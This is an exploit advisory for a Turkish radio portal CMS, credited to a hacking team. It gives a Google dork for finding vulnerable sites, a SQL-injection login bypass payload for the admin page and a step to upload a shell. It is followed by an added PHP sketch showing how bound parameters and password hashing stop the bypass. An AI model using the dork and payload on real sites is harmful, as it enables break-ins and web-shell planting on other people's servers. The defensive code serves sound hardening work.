Turkish Radyo Portal Authentication Bypass / Shell Upload

2015.12.03
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################
# Exploit Title : Turkish Radyo Portal Authentication Bypass / Shell Upload
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.radyositesikur.com/
# Google Dork : Radyo inurl:haberoku.php?id=
# Date: 2015/12/01
# Version : V1 & V2
#
######################
# PoC:
# target/admin
# To bypass the login page enter '=' 'or' for username and password input.
# Login And Upload Shell D:
# Youtube Demo : https://www.youtube.com/watch?v=0tvAu_g47Zc
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################

References:

https://www.youtube.com/watch?v=0tvAu_g47Zc
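
Mitigation sketch for the login bypass described in the PoC, as an added example that is not the vendor's code and not part of the original advisory. It assumes the admin login splices form input into a SQL string; the table, column, account and function names are hypothetical, and an in-memory SQLite database (pdo_sqlite) stands in for the real backend so the script runs offline.

```php
<?php
// Added example. Schema and names below are assumptions, not the product's own.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');

// Constructed sample account; only a password hash is stored.
$ins = $pdo->prepare('INSERT INTO admin (username, pass_hash) VALUES (?, ?)');
$ins->execute(['yonetici', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// Pattern to avoid: form input becomes part of the statement text, so quote
// characters in the input end the string literal and the rest is parsed as SQL.
function build_concatenated_query(string $user, string $pass): string
{
    return "SELECT * FROM admin WHERE username='$user' AND password='$pass'";
}

// Hardened check: the username is bound as a parameter (always data, never
// syntax) and the password is verified in PHP against the stored hash.
function check_login(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT pass_hash FROM admin WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();   // false when no such user exists
    return is_string($hash) && password_verify($pass, $hash);
}

$input = "'=' 'or'";   // the value given in the advisory's PoC

// Print the statement text the unsafe pattern would produce for that input.
echo build_concatenated_query($input, $input), PHP_EOL;

// The same input is treated as a literal username and password here.
var_dump(check_login($pdo, $input, $input));
var_dump(check_login($pdo, 'yonetici', 'constructed-sample-password'));
```

The printed statement shows where the input's quotes fall relative to the ones in the query template; the two var_dump calls show how the bound-parameter version handles the PoC input and the constructed valid credentials.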

